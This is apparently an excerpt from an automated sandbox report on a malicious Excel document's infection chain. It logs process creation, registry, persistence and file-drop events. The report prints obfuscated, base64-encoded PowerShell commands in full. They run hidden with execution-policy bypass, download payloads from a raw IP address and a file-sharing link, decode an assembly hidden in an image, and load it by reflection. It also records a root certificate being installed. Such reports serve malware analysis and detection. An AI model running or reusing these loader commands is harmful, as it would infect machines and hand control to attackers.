ICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899E022D push eax; iretd 5_2_000007FE899E0241
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899E00BD pushad ; iretd 5_2_000007FE899E00C1

      Persistence and Installation Behavior

      barindex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.dllJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
